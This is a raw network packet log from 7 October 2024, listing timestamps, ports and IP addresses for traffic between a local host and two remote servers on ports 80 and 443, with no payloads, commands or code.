Oct 7, 2024 03:15:43.813194036 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.827858925 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.827893972 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.827910900 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.828037024 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.828037977 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.842602015 CEST	443	49859	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:43.847620964 CEST	49859	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:43.847641945 CEST	443	49859	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:43.848136902 CEST	49859	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:43.848145008 CEST	443	49859	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:43.888653994 CEST	443	49857	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:43.888809919 CEST	443	49857	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:43.889030933 CEST	49857	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:43.889087915 CEST	49857	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:43.889101982 CEST	443	49857	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:43.889113903 CEST	49857	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:43.889120102 CEST	443	49857	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:43.892465115 CEST	49862	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:43.892513037 CEST	443	49862	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:43.892596006 CEST	49862	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:43.892725945 CEST	443	49860	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:43.892741919 CEST	49862	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:43.892761946 CEST	443	49862	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:43.893152952 CEST	49860	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:43.893213987 CEST	443	49860	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:43.893614054 CEST	49860	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:43.893626928 CEST	443	49860	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:43.899666071 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.899686098 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.899705887 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.899750948 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.899769068 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.899786949 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.899811029 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.899837971 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.899856091 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.899874926 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.899876118 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.899898052 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.899925947 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.899929047 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.899947882 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.899956942 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.899976015 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.899986029 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.899995089 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.900012970 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.900021076 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.900032997 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.900049925 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.900064945 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.900079012 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.900079966 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.900096893 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.900105953 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.900124073 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.900141954 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.900154114 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.900171041 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.900191069 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.900208950 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.900213957 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.900230885 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.900235891 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.900249004 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.900264978 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.900280952 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.900295019 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.900312901 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.900331020 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.900358915 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.900360107 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.900373936 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.900377035 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.900394917 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.900427103 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.900438070 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.900444984 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.900461912 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.900463104 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.900480032 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.900482893 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.900497913 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.900509119 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.900518894 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.900528908 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.900537968 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.900548935 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.900562048 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.900564909 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.900588989 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.900588989 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.900604010 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.900607109 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.900624037 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.900640965 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.900646925 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.900669098 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.900671959 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.900671959 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.900685072 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.900686026 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.900717974 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.900724888 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.900727034 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.900752068 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.900769949 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.900779963 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.900787115 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.900801897 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.900815010 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.900815964 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.900832891 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.900835037 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.900851011 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.900863886 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.900875092 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.900886059 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.900896072 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.900902987 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.900919914 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.900927067 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.900937080 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.900953054 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.900954962 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.900971889 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.900975943 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.900985956 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.901005030 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.901021004 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.901022911 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.901038885 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.901056051 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.901057005 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.901074886 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.901074886 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.901093006 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.901104927 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.901108980 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.901122093 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.901128054 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.901139021 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.901160002 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.901175976 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.901176929 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.901192904 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.901204109 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.901218891 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.901238918 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.901249886 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.901249886 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.901254892 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.901262999 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.901273012 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.901289940 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.901295900 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.901300907 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.901309967 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.901328087 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.901325941 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.901360035 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.901385069 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.901388884 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.901415110 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.901437998 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.901456118 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.901460886 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.901474953 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.901487112 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.901492119 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.901510000 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.901513100 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.901529074 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.901549101 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.901551962 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.901566029 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.901580095 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.901582956 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.901592016 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.901612043 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.901619911 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.901628971 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.901655912 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.901659966 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.901676893 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.901684999 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.901695013 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.901714087 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.901715040 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.901725054 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.901742935 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.901743889 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.901753902 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.901762009 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.901781082 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.901807070 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.901814938 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.901829004 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.901840925 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.901859999 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.901871920 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.901886940 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.901899099 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.901907921 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.901928902 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.901945114 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.901947021 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.901971102 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.901983023 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.901987076 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.902010918 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.902018070 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.902036905 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.902039051 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.902055025 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.902070045 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.902072906 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.902087927 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.902090073 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.902105093 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.902107000 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.902122021 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.902126074 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.902144909 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.902156115 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.902156115 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.902163982 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.902178049 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.902183056 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.902189970 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.902203083 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.902215004 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.902228117 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.902246952 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.905170918 CEST	443	49858	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:43.905241013 CEST	443	49858	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:43.905385971 CEST	49858	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:43.905433893 CEST	49858	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:43.905440092 CEST	443	49858	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:43.905452013 CEST	49858	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:43.905456066 CEST	443	49858	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:43.907943964 CEST	49863	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:43.908000946 CEST	443	49863	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:43.908085108 CEST	49863	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:43.908212900 CEST	49863	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:43.908241034 CEST	443	49863	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:43.956633091 CEST	443	49859	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:43.956707001 CEST	443	49859	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:43.956872940 CEST	49859	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:43.957324028 CEST	49859	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:43.957343102 CEST	443	49859	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:43.957365990 CEST	49859	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:43.957374096 CEST	443	49859	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:43.960561991 CEST	49864	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:43.960664988 CEST	443	49864	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:43.960768938 CEST	49864	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:43.960932016 CEST	49864	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:43.960962057 CEST	443	49864	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:43.990849972 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.990890980 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.990952015 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.991004944 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.991076946 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.991091013 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.991131067 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.991166115 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.991188049 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.991197109 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.991219997 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.991220951 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.991255045 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.991307974 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.991309881 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.991360903 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.991367102 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.991434097 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.991436958 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.991486073 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.991486073 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.991538048 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.991539001 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.991590977 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.991591930 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.991626024 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.991641998 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.991676092 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.991677999 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.991729021 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.991729975 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.991777897 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.991781950 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.991815090 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.991832018 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.991848946 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.991864920 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.991899967 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.991902113 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.991935968 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.991950989 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.991991043 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.991993904 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.992026091 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.992041111 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.992059946 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.992075920 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.992109060 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.992124081 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.992180109 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.992180109 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.992238998 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.992296934 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.992299080 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.992331982 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.992347956 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.992383003 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.992389917 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.992425919 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.992440939 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.992475986 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.992479086 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.992511034 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.992526054 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.992544889 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.992568970 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.992579937 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.992594957 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.992628098 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.992631912 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.992669106 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.992679119 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.992716074 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.992722034 CEST	80	49782	95.164.90.97	192.168.2.5
